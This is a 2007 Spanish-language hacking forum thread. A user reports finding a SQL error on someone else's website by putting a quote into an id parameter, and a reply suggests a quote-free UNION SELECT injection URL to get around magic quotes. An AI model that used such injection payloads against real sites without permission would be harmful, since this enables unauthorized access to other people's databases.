Inyección sql

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

19 Abril 2024, 22:24 pm

Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

Inyección sql

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Ir Abajo

Respuesta

Imprimir

Autor

Tema: Inyección sql (Leído 2,463 veces)

IMAC

Desconectado

Desconectado

Mensajes: 13

¡ Think Different - Think Apple !

Ver Perfil

Inyección sql

« en: 11 Diciembre 2007, 19:50 pm »

Buenas, he posteado esto antes en la sección de programación, pero creo que me equivoqué de lugar. Espero que este sea el adecuado.

La cuestión es que mirando una página me encontré con esta url:
https://unaweb.com/ver.php?id=202

Y entonces me planté probar su seguridad con esta tontada:
https://unaweb.com/ver.php?id='a'

Y fue entonces cuando saltó el siguiente error:

Código:

SELECT id_user FROM user WHERE status = 1 AND id_pagina =\'a\' 
You have an error in your SQL syntax. Check the manual that corresponds 
to your MySQL server version for the right syntax to use near '\'a\'' at line 1

Con esto veo que tiene magic cuotes activado o bien alguna función que inhabilita los caracteres especiales '.

Me preguntaba sin con esta información de la tabla, la fila y demás podría llevar a cabo alguna acción a pesar de las magic cuotes.

Saludos.


	En línea

Thor

Desconectado

Desconectado

Mensajes: 1.177

Ver Perfil

Re: Inyección sql

« Respuesta #1 en: 24 Diciembre 2007, 01:29 am »

Con tal de no usar las comillas....
https://unaweb.com/ver.php?id=1 union select campo from user /*

Código:

SELECT id_user FROM user WHERE status = 1 AND id_pagina =1 union select campo from user /*

Creo que debería funcionar $:-\$


	En línea

Páginas: [1]

Ir Arriba

Respuesta

Imprimir

Ir a:

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines